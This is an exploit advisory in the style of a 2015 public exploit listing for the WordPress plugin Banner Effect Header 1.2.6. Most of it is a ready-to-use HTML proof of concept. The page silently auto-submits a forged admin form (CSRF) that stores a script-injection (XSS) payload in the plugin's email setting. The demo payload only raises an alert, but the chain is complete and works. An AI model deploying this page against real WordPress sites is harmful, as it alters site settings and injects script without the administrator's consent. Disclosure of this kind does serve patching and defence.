|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress Banner Effect Header 1.2.6 Plugin XSS, CSRF Vulnerability | |[*] Date : Date: 2015-01-02 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : https://wordpress.org/plugins/banner-effect-header/ | |[*] Plugin Link : https://downloads.wordpress.org/plugin/banner-effect-header.zip | |[*] Tested on: Windows 7 | |[*] Discovered By : Mahdi.Hidden | |-------------------------------------------------------------------------| | |[*] Location :http://[localhost]/[path]/wp-admin/options-general.php?page=BannerEffectOptions | |-------------------------------------------------------------------------| Exploit Code: <html> <body> <form name="post_form" method="post" action="http://localhost/wordpress/wp-admin/options-general.php?page=BannerEffectOptions"> <input type="hidden" name="banner_effect_submit_hidden" value="Y"> <input type="hidden" name="banner_effect_email" value='a@a.com"><script>alert(/xss/)</script>'> <script language="Javascript"> setTimeout('post_form.submit()', 1); </script> </form> </body> </html> |-------------------------------------------------------------------------| | This is CSRF & XSS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|